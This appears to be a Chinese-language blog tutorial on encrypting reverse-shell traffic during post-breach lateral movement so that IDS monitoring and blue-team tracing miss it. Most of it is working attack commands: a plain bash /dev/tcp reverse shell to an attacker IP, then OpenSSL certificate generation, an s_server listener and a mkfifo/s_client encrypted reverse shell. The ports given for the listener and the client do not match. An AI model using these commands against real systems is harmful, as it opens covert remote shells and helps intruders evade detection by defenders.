登录后台

已禁止登录!

页面导航

介绍

通过外网打到服务器内网了,现在需要扩大我们的战果,进行横向移动,在进行横向移动的时候,大部分很多时候的工作都是进行反弹shell,或者是通过我们的msf,cs的一个马发过去进行连接,正常操作是这个样子是没问题的,但如果说对方的内网里有IDS这一类的流量审计的一些软件,如果不进行流量加密,极有可能触发警告,此时如果被蓝队人员发现,他就可以顺藤摸瓜进行溯源,并且这次攻击也会以失败告终,因为对方看到后会进行关闭一些端口以及ip。在内网中,反弹shell基本都是明文的,这就显现出了流量加密的重要性




开启加密之路

先来看看流量是怎么走的:

1. 攻击机kali:

nc -lvp 8899

2022-12-29T07:49:58.png

2. 受害机centos7,将权限交给攻击机:

bash -i >& /dev/tcp/172.16.2.11/8899 0>&1

2022-12-29T07:56:13.png

攻击机收到并可以执行命令
2022-12-29T07:57:42.png

3. 打开wireshark,追踪tcp流:

2022-12-29T08:02:11.png

这样子绝对会被拦截

什么是OpenSSL呢:

简单来理解就是https,和http不一样,http用wireshark抓包以后是明文的,抓https就是乱码的
比如说抓个百度的包

2022-12-29T08:12:53.png

就是一堆乱码


配置攻击:

1.生成openSSL证书(攻击机) 开始配置:

一直回车就好,当然也可以自己填,伪造一下

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cer.pem -days 365 -nodes

2022-12-29T08:33:39.png

这两个证书整好了以后,就可以进行加密监听了

2.攻击机kali加密监听:

openssl s_server -quiet -key key.pem -cert cer.pem -port 9999

3.受害机centos7反弹shell:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 172.16.2.11:8080 > /tmp/s; rm /tmp/s

2022-12-29T08:40:54.png

来到攻击机,接收到了一个shell,也是正常执行命令的
2022-12-29T08:41:36.png

4.wireshark抓个包:

2022-12-29T08:45:08.png

可以看到不管是哪一个包都是经过加密了的,这样就可以躲避ids的一个流量审计了

后持续更新
反弹shell加密
MSF流量加密
CS生成证书是配置profile进行加密
CS域前置加密
腾讯云函数
......